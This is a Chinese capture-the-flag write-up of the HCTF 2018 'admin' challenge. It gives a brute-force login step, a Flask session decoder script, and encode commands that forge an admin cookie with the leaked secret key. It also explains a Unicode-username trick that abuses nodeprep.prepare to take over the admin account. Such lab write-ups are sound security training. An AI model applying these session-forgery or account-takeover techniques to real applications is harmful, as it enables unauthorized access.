[HCTF 2018]admin
一进入页面,发现,在未登录的情况下,我们只能访问3个页面index、login、register
同时我们观察 index 下的源码,发现
you are not admin 提示我们要进行登录
登录admin
可以进行 弱密码破解、sql访问数据库查看密码
当然,如果没有密码也可以,利用csrf漏洞,跨站请求伪造,让服务器以为我们是 admin
先进行弱密码破解,使用burpsuite
发现密码是 123
登录,获得flag
使用 bp 进行弱密码破解 破解成功获取flag
.
尝试进行sql注入,发现对 单引号 双引号 空格
进行过滤,没办法对前面的内容进行闭合 所以sql 注入失败
但是,本关就绝不可能仅仅只是考察 弱密码破解,我们还没有用到 register 页面
所以在本关可能就是在考察 csrf 让我们篡改 cookie值 伪造 admin
我们尝试使用该页面进行注册,看能否会有什么信息
观察页面和源代码我们是无法发现什么的
我们抓一下包,看看能否有什么发现,发现本关的突破口确实在 session 上
我们可以先了解下 session
当用户第一次请求服务器的时候,服务器根据用户提交的相关信息,创建对应的 Session。请求返回时 sessionid将作为唯一标识=信息,返回浏览器,同时 浏览器将 sessionid 存入到 cookie中,在用户第二次访问服务器的时候,浏览器会将sessionid发送给服务器,服务端根据 sessionid查找对应的session 如果找到 Session ,用户登录并执行后面操作。
flask中有一个session对象,它允许你在不同请求间存储特定用户的信息。
为了防止被不怀好意的黑客篡改,flask中的sessionid 和 token 相似 都存在签名。
正常来说,因为签名的存在,我们是无法轻易的篡改的
但在本关,因为而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的。
所以,本关的考察方向就呼之欲出了:利用flask session伪造来解题。
在这里 挂一篇大佬的 exp
#index.html
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)
decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True
try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')
if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')
return session_json_serializer.loads(payload)
if __name__ == '__main__':
s = "这里填入需要解密的session"
print(decryption(s.encode()))
利用大佬的exp进行解密 我们获得的 sessionid
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-S6nBtjti-1650010582282)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220415160548733.png)]
通过解密后的内容可以看到解密出来原来的内容,能看到很明显一个name字段正是我们之前注册的hcj账户,那只要改一下这个值,将其修改为admin,然后重新加密一下就可以了
直接使用脚本就可以获取加密的sessionid了
加密脚本获取
python3 ./flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'3ca4bd7cc2e28139e9e1962ea737e7c901883f0fbecb9a1df7f45c23b9816404c55626e5799bed5f3968a379e68559254211f490ff49b41bc8bb9ab93c6f5f4f', 'csrf_token': b'da5ebb2c1dfe93c9c1276b6428e8dcbdfa22e39e', 'image': b'YEfZ', 'name': 'admin', 'user_id': '10'}"
或者
python2 ./flask_session_cookie_manager2.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'3ca4bd7cc2e28139e9e1962ea737e7c901883f0fbecb9a1df7f45c23b9816404c55626e5799bed5f3968a379e68559254211f490ff49b41bc8bb9ab93c6f5f4f', 'csrf_token': b'da5ebb2c1dfe93c9c1276b6428e8dcbdfa22e39e', 'image': b'YEfZ', 'name': 'admin', 'user_id': '10'}"
将我们获得sessionid复制到 bp上
repeater 点击GO
获得 flag
还有一种方法,Unicode欺骗
是我查了博客才明白的
修改密码,创建用户,登录的时候都是用strlower()先将name转成小写
我们先了解下 strlower 函数
def strlower(username):
username = nodeprep.prepare(username)
return username
nodeprep.prepare的版本与当前版本相差过大
存在可能 漏洞
我们发现在使用nodeprep.prepare函数转换时过程如下:
ᴬᴰᴹᴵᴺ -> ADMIN -> admin
假如我们注册ᴬᴰᴹᴵᴺ用户,然后在用ᴬᴰᴹᴵᴺ用户登录,因为在login函数里使用了一次nodeprep.prepare函数,因此我们登录上去看到的用户名为ADMIN,此时我们再修改密码,又调用了一次nodeprep.prepare函数将name转换为admin,然后我们就可以改掉admin的密码,最后利用admin账号登录即可拿到flag。